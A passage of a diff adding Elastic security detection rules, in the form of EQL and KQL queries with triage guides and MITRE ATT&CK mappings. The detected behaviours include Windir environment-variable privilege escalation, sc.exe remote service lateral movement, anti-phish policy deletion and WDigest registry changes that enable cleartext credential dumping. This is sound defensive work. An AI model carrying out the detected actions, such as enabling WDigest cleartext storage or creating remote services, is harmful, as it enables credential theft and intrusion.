audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule the following additional audit rules are required to be added to the integration:\n -- \"-w /etc/ -p rwxa -k audit_recursive_etc\"\n -- \"-w /root/ -p rwxa -k audit_root\"\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "type": "eql", + "version": 3 + }, + "id": "d55abdfb-5384-402b-add4-6c401501b0c3_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_105.json b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_105.json new file mode 100644 index 00000000000..f6bb876b179 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_105.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a privilege escalation attempt via a rogue Windows directory (Windir) environment variable. This is a known primitive that is often combined with other vulnerabilities to elevate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via Windir Environment Variable", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKEY_USERS\\\\*\\\\Environment\\\\windir\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\systemroot\",\n \"HKU\\\\*\\\\Environment\\\\windir\",\n \"HKU\\\\*\\\\Environment\\\\systemroot\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\windir\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\systemroot\"\n ) and\n not registry.data.strings : (\"C:\\\\windows\", \"%SystemRoot%\")\n", + "references": [ + "https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d563aaba-2e72-462b-8658-3e5ea22db3a6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.007", + "name": "Path Interception by PATH Environment Variable", + "reference": "https://attack.mitre.org/techniques/T1574/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 105 + }, + "id": "d563aaba-2e72-462b-8658-3e5ea22db3a6_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_106.json b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_106.json new file mode 100644 index 00000000000..35ac2e95342 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_106.json @@ -0,0 +1,85 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a privilege escalation attempt via a rogue Windows directory (Windir) environment variable. This is a known primitive that is often combined with other vulnerabilities to elevate privileges.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "endgame-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Privilege Escalation via Windir Environment Variable", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKEY_USERS\\\\*\\\\Environment\\\\windir\",\n \"HKEY_USERS\\\\*\\\\Environment\\\\systemroot\",\n \"HKU\\\\*\\\\Environment\\\\windir\",\n \"HKU\\\\*\\\\Environment\\\\systemroot\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\windir\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Environment\\\\systemroot\"\n ) and\n not registry.data.strings : (\"C:\\\\windows\", \"%SystemRoot%\")\n", + "references": [ + "https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d563aaba-2e72-462b-8658-3e5ea22db3a6", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/", + "subtechnique": [ + { + "id": "T1574.007", + "name": "Path Interception by PATH Environment Variable", + "reference": "https://attack.mitre.org/techniques/T1574/007/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "d563aaba-2e72-462b-8658-3e5ea22db3a6_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_106.json b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_106.json new file mode 100644 index 00000000000..38ee72e7d8d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_106.json @@ -0,0 +1,141 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies use of sc.exe to create, modify, or start services on remote hosts. This could be indicative of adversary lateral movement but will be noisy if commonly done by admins.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Service Command Lateral Movement", + "query": "sequence by process.entity_id with maxspan = 1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name : \"sc.exe\") and\n process.args : \"\\\\\\\\*\" and process.args : (\"binPath=*\", \"binpath=*\") and\n process.args : (\"create\", \"config\", \"failure\", \"start\")]\n [network where host.os.type == \"windows\" and process.name : \"sc.exe\" and destination.ip != \"127.0.0.1\"]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_9.json b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_9.json new file mode 100644 index 00000000000..00fffe06a81 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d68e95ad-1c82-4074-a12a-125fe10ac8ba_9.json @@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the execution of discovery commands to enumerate system information, files, and folders using the Windows Command Shell.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Information Discovery via Windows Command Shell", + "note": "## Triage and analysis\n\n### Investigating System Information Discovery via Windows Command Shell\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule identifies commands to enumerate system information, files, and folders using the Windows Command Shell.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"cmd.exe\" and process.args : \"/c\" and process.args : (\"set\", \"dir\") and\n not process.parent.executable : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\PROGRA~1\\\\*\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + }, + { + "id": "T1083", + "name": "File and Directory Discovery", + "reference": "https://attack.mitre.org/techniques/T1083/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 9 + }, + "id": "d68e95ad-1c82-4074-a12a-125fe10ac8ba_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_103.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_103.json new file mode 100644 index 00000000000..8562fce4d93 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_103.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-AntiPhishPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_105.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_105.json new file mode 100644 index 00000000000..f6569fd1f28 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_105.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-AntiPhishPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_206.json b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_206.json new file mode 100644 index 00000000000..399b9bbea54 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_206.json @@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of an anti-phishing policy in Microsoft 365. By default, Microsoft 365 includes built-in features that help protect users from phishing attacks. Anti-phishing polices increase this protection by refining settings to better detect and prevent attacks.", + "false_positives": [ + "An anti-phishing policy may be deleted by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Anti-Phish Policy Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"Remove-AntiPhishPolicy\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/remove-antiphishpolicy?view=exchange-ps", + "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/set-up-anti-phishing-policies?view=o365-worldwide" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Initial Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1566", + "name": "Phishing", + "reference": "https://attack.mitre.org/techniques/T1566/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "d68eb1b5-5f1c-4b6d-9e63-5b6b145cd4aa_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_108.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_108.json new file mode 100644 index 00000000000..5519564d142 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_108.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to modify the WDigest security provider in the registry to force the user's password to be stored in clear text in memory. This behavior can be indicative of an adversary attempting to weaken the security configuration of an endpoint. Once the UseLogonCredential value is modified, the adversary may attempt to dump clear text passwords from memory.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of WDigest Security Provider", + "note": "## Triage and analysis\n\n### Investigating Modification of WDigest Security Provider\n\nIn Windows XP, Microsoft added support for a protocol known as WDigest. The WDigest protocol allows clients to send cleartext credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications based on RFC 2617 and 2831. Windows versions up to 8 and 2012 store logon credentials in memory in plaintext by default, which is no longer the case with newer Windows versions.\n\nStill, attackers can force WDigest to store the passwords insecurely on the memory by modifying the `HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential` registry key. This activity is commonly related to the execution of credential dumping tools.\n\n#### Possible investigation steps\n\n- It is unlikely that the monitored registry key was modified legitimately in newer versions of Windows. Analysts should treat any activity triggered from this rule with high priority as it typically represents an active adversary.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine if credential dumping tools were run on the host, and retrieve and analyze suspicious executables:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled task creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Use process name, command line, and file hash to search for occurrences on other hosts.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This modification should not happen legitimately. Any potential benign true positive (B-TP) should be mapped and monitored by the security team, as these modifications expose the entire domain to credential compromises and consequently unauthorized access.\n\n### Related rules\n\n- Mimikatz Powershell Module Activity - ac96ceb8-4399-4191-af1d-4feeac1f1f46\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Reimage the host operating system and restore compromised files to clean versions.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type : (\"creation\", \"change\") and\n registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\SecurityProviders\\\\WDigest\\\\UseLogonCredential\"\n ) and registry.data.strings : (\"1\", \"0x00000001\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\svchost.exe\" and user.id : \"S-1-5-18\")\n", + "references": [ + "https://www.csoonline.com/article/3438824/how-to-detect-and-halt-credential-theft-via-windows-wdigest.html", + "https://www.praetorian.com/blog/mitigating-mimikatz-wdigest-cleartext-credential-theft?edition=2019", + "https://frsecure.com/compromised-credentials-response-playbook", + "https://www.elastic.co/security-labs/detect-credential-access" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_109.json b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_109.json new file mode 100644 index 00000000000..ae03953cc0f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d703a5af-d5b0-43bd-8ddb-7a5d500b7da5_109.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to modify the WDigest security provider in the registry to force the user's password to be stored in clear text in memory. This behavior can be indicative of an adversary attempting to weaken the security configuration of an endpoint. Once the UseLogonCredential value is modified, the adversary may attempt to dump clear text passwords from memory.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Modification of WDigest Security Provider", + "note": "## Triage and analysis\n\n### Investigating Modification of WDigest Security Provider\n\nIn Windows XP, Microsoft added support for a protocol known as WDigest. The WDigest protocol allows clients to send cleartext credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications based on RFC 2617 and 2831. Windows versions up to 8 and 2012 store logon credentials in memory in plaintext by default, which is no longer the case with newer Windows versions.\n\nStill, attackers can force WDigest to store the passwords insecurely on the memory by modifying the `HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential` registry key. This activity is commonly related to the execution of 